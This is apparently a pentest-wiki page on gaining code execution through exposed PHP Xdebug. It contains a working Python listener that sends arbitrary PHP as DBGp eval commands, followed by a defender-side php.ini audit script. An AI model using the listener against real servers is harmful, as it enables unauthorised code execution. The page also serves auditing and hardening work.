PHP XDebug

php, rce, foothold

Overview

Xdebug is a PHP debugging tool that supports remote debugging of PHP code running on a server from the source code on a local machine. Xdebug is powerful, and there have been many articles about its configuration recently. The idea of digging into Xdebug's attack surface came to me a long time ago, and I finally did it today, a day suitable for paddling.

Vulnerable Versions

Example Exploit Scripts

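#!/usr/bin/python2
# Python 2 only: uses raw_input() and str.encode('base64').
import socket

# Listen on port 9000 and wait for Xdebug to connect
# to this socket as if it were a debugger client.
ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()

while True:
    # Print whatever the debug session sends (DBGp XML packets).
    client_data = conn.recv(1024)
    print(client_data)

    # Send the typed PHP expression as a DBGp "eval" command:
    # base64-encoded data after "--", terminated by a NUL byte.
    data = raw_input('>> ')
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))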
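
A defender-side check for the precondition of the script above, added here as an example and not part of the original page: it scans php.ini text for the Xdebug step-debugging directives that make PHP connect out to a debugger. The sample ini fragments and the finding codes are constructed for illustration; the directive names are the Xdebug 2 (`xdebug.remote_*`) and Xdebug 3 (`xdebug.mode`, `xdebug.client_host`, `xdebug.discover_client_host`) settings.

```python
import ipaddress

# Constructed php.ini fragments for the demo (not taken from the page).
SAMPLE_EXPOSED = """\
[xdebug]
xdebug.remote_enable = 1
xdebug.remote_connect_back = On  ; debugger address comes from the request
xdebug.remote_port = 9000
"""
SAMPLE_LOCAL_ONLY = """\
xdebug.mode = develop,debug
xdebug.client_host = 127.0.0.1
"""
TRUTHY = {"1", "on", "true", "yes"}

def parse_xdebug_settings(ini_text):
    """Collect xdebug.* directives from php.ini text; a later line overrides an earlier one."""
    settings = {}
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ';' comments
        key, _, value = line.partition("=")
        if key.strip().lower().startswith("xdebug."):
            settings[key.strip().lower()] = value.strip().strip("\"'").lower()
    return settings

def is_loopback(host):
    try:
        return host == "localhost" or ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # other hostnames cannot be shown to be local

def audit(ini_text):
    """Return finding codes for settings that let PHP open a debug session to a remote host."""
    s = parse_xdebug_settings(ini_text)
    modes = [m.strip() for m in s.get("xdebug.mode", "").split(",")]
    if s.get("xdebug.remote_enable", "0") not in TRUTHY and "debug" not in modes:
        return []  # step debugging is off (Xdebug 2 and 3 directive names)
    findings = ["STEP_DEBUG_ENABLED"]
    if (s.get("xdebug.remote_connect_back", "0") in TRUTHY
            or s.get("xdebug.discover_client_host", "0") in TRUTHY):
        findings.append("CLIENT_FROM_REQUEST")  # debugger host is not pinned
    host = s.get("xdebug.client_host", s.get("xdebug.remote_host", "localhost"))
    if not is_loopback(host):
        findings.append("NON_LOOPBACK_CLIENT:" + host)
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_EXPOSED), audit(SAMPLE_LOCAL_ONLY))
```

On a production host the expected result is an empty list; any finding means the PHP process will initiate debug connections and should be reviewed together with egress filtering for the debugger port.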

Alternatives

References